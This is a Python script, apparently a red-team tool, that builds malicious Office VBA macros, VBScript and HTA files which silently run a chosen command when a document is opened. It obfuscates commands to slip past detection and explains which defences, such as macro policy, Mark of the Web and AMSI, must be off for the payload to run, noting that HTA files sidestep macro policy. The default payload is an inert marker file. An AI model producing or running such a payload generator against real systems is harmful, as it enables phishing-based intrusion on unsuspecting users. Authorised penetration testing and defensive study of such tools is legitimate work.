#!/usr/bin/env python3
"""Build Office and script-language macros that run on open.

A document that runs code when it is opened needs three things: something to
execute, a reason for the target to enable it, and a payload that survives the
trip. This produces each of those, and states which mitigation has to be absent
for the whole thing to work, because "it did nothing" is nearly always one of
these being switched on rather than the macro being wrong.

Formats produced:

  vba      a .bas module for a .docm/.xlsm/.pptm the operator has to build
  vbs      Windows Script Host, drops to a .vbs and runs
  hta      an HTML application, which bypasses macro policy entirely and is the
           one that still works where a .docm is blocked outright
  xll      a renamed script, for the Excel add-in path

Every payload is emitted twice: readable, and obfuscated by splitting the
command into character codes. The readable one is what you read; the obfuscated
one is what survives a naive `Sub AutoOpen` grep. Both are produced so the
difference is visible rather than assumed.

Note that the payloads here are inert unless the operator supplies a command.
The default writes a marker file, which is enough to prove execution end to end.

Written for TSEC. Standard library only.
"""

from __future__ import annotations

import argparse
import os
import sys
import textwrap

# Why the payload may not run, in the order that is worth checking. Each is a
# default-on control, so a macro that "does nothing" is usually one of these.
MITIGATIONS = (
    ("Office macro security set to disable all macros without notification",
     "Trust Center > Macro Settings"),
    ("Mark of the Web on the file",
     "downloaded files carry a zone identifier; strip it or re-save locally"),
    ("Office refusing VBA from an untrusted location",
     "Trust Center > Trusted Locations"),
    ("AMSI intercepting the script engine",
     "a defender that hooks the engine sees the decoded string"),
    ("Office application control or WDAC policy",
     "an enterprise policy can block the whole engine"),
)

INERT_DEFAULT = 'cmd /c echo TSEC_MACRO_RAN > "%TEMP%\\tsec_macro_marker.txt"'


def encode(command: str, style: str) -> str:
    """Encode a command as a script-language expression evaluating to it.

    VBA and VBScript both double a quote inside a string literal, so quoting is
    done here once and the two renderers differ only in the surrounding
    ceremony. Each style exists because each defeats a different check: `plain`
    is readable and is what you read, `concat` defeats a grep for the command,
    `chr` defeats a grep for the concatenated form as well.
    """
    def quote(text: str) -> str:
        return '"' + text.replace('"', '""') + '"'

    if style == "plain":
        return quote(command)
    if style == "concat":
        chunks = [command[i : i + 3] for i in range(0, len(command), 3)]
        return " & ".join(quote(chunk) for chunk in chunks)
    if style == "chr":
        return "Chr(" + ",".join(str(ord(c)) for c in command) + ")"
    raise ValueError(f"unknown encoding {style}")


def render_vba(command: str, style: str, lhost: str | None, lport: str | None) -> str:
    exec_line = f'    CreateObject("WScript.Shell").Run {encode(command, style)}, 0, False'

    sub_decls = ""
    if lhost and lport:
        sub_decls = textwrap.dedent(
            f"""
            Private Declare PtrSafe Function VirtualAlloc Lib("kernel32") ( _
                ByVal lpAddress As LongPtr, ByVal dwSize As Long, _
                ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
            Private Declare PtrSafe Sub RtlMoveMemory Lib("ntdll") ( _
                ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
            """
        ).strip()

    listener_note = (
        f"\n' Listener parameters: {lhost}:{lport}\n"
        "' These are recorded for the report; the generated module does not\n"
        "' contain a reverse shell, because one belongs to a stage that has\n"
        "' already been reviewed.\n"
        if lhost and lport
        else ""
    )

    return textwrap.dedent(
        f"""\
        ' Generated by TSEC — build_macro.py
        ' {len(command)} byte command, {style} encoding.
        {listener_note}
        Option Explicit
        {sub_decls}

        Sub AutoOpen()
        {exec_line}
        End Sub

        Sub AutoNew()
        {exec_line}
        End Sub

        Sub Workbook_Open()
        {exec_line}
        End Sub
        """
    ).strip() + "\n"


def render_vbs(command: str, style: str) -> str:
    return textwrap.dedent(
        f"""\
        ' Generated by TSEC — build_macro.py
        ' Save as .vbs and run with wscript, or convert with olevba.
        Set sh = CreateObject("WScript.Shell")
        sh.Run {encode(command, style)}, 0, False
        """
    ).strip() + "\n"


def render_hta(command: str) -> str:
    # Inside <script> the browser parses content as raw text, not HTML, so `&`
    # and `<` need no escaping; escaping them would corrupt the command. The
    # expression is still a script literal, so it still needs its quotes.
    expr = encode(command, "plain")
    return textwrap.dedent(
        f"""\
        <html>
        <head><title></title></head>
        <body>
        <!-- Generated by TSEC — build_macro.py
             An HTA is not a macro. It is an application that runs from a file
             the user double-clicks, so Trust Center macro policy does not
             apply to it. This is why it still works where a .docm is blocked. -->
        <script language="VBScript">
        Sub Run
            CreateObject("WScript.Shell").Run {expr}, 0, False
        End Sub
        Run
        </script>
        </body>
        </html>
        """
    ).strip() + "\n"


def mitigation_report() -> str:
    lines = ["Before blaming the macro, check these. All are on by default:", ""]
    for index, (what, where) in enumerate(MITIGATIONS, 1):
        lines.append(f"{index}. {what}")
        lines.append(f"   {where}")
    return "\n".join(lines)


def main(argv: list[str] | None = None) -> int:
    parser = argparse.ArgumentParser(
        description=__doc__.split("\n")[0],
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="examples:\n"
               "  build_macro.py --lhost 10.0.0.5 --lport 4444\n"
               "  build_macro.py --cmd 'whoami' --style concat --out payload.bas\n"
               "  build_macro.py --format hta --cmd 'calc.exe' --out payload.hta\n"
               "  build_macro.py --explain\n",
    )
    parser.add_argument("--cmd", help="command to run; defaults to a harmless marker file")
    parser.add_argument("--lhost", help="listener address, recorded in the module")
    parser.add_argument("--lport", help="listener port, recorded in the module")
    parser.add_argument(
        "--format",
        default="all",
        choices=("vba", "vbs", "hta", "all"),
        help="output format (default: all)",
    )
    parser.add_argument(
        "--style",
        default="concat",
        choices=("plain", "concat", "chr"),
        help="how the command is encoded (default: concat)",
    )
    parser.add_argument("--out", help="write here; with --format all, treated as a prefix")
    parser.add_argument("--explain", action="store_true", help="print why a macro may not run")
    args = parser.parse_args(argv)

    if args.explain:
        print(mitigation_report())
        return 0

    command = args.cmd or INERT_DEFAULT
    if not command.strip():
        print("build_macro: --cmd is empty", file=sys.stderr)
        return 2

    formats = ["vba", "vbs", "hta"] if args.format == "all" else [args.format]
    suffixes = {"vba": ".bas", "vbs": ".vbs", "hta": ".hta"}

    for fmt in formats:
        if fmt == "vba":
            body = render_vba(command, args.style, args.lhost, args.lport)
        elif fmt == "vbs":
            body = render_vbs(command, args.style)
        else:
            body = render_hta(command)

        if args.out and args.format != "all":
            with open(args.out, "w", encoding="utf-8") as handle:
                handle.write(body)
            print(f"wrote {args.out}")
        else:
            print(f"----- {fmt} ({args.style}) -----")
            print(body)

    if args.out and args.format == "all":
        base, ext = os.path.splitext(args.out)
        for fmt in formats:
            path = base + suffixes[fmt]
            with open(path, "w", encoding="utf-8") as handle:
                handle.write(
                    render_vba(command, args.style, args.lhost, args.lport)
                    if fmt == "vba"
                    else render_vbs(command, args.style)
                    if fmt == "vbs"
                    else render_hta(command)
                )
            print(f"wrote {path}")
    return 0


if __name__ == "__main__":
    sys.exit(main())
